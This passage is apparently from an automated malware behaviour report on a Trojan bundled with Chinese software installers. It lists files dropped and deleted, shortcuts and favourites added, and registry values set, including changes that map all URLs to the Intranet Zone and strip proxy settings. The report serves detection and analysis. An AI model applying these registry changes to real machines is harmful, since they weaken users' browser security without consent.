%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\irg[1].ashx (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\ErrorNet[1].htm (0 bytes)

The process 9158.exe:3012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process xianfengupdate.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\打折网购.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\All Users\Desktop\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)

The Trojan deletes the following file(s):

%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (0 bytes)

The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\xfplay\tools.exe (1530 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2566 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3345 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Program Files%\xfplay\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)

Registry activity

The process 9158chat2_ktv088_63.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"

[HKLM\SOFTWARE\9158web]
"StartTime" = "11070701"

[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\9158Service]
"LastPlat" = "51"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"DisplayVersion" = "6.940"
"DisplayName" = "9158¶àÈËÊÓƵ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158¶àÈËÊÓƵ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F B0 73 C9 4C FA 32 79 A2 41 44 B1 71 CD D1 E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "Ìì¸ñ¿Æ¼¼£¨º¼ÖÝ£©ÓÐÏÞ¹«Ë¾"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"URLInfoAbout" = "http://www.9158.com/"

The process sr.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA EA 78 7D 63 CE F0 13 1F C2 0F EA A3 C0 FB 44"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9158IE.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E B7 9E F5 94 82 B8 48 BB 6E 0E 52 D8 BA F0 0C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
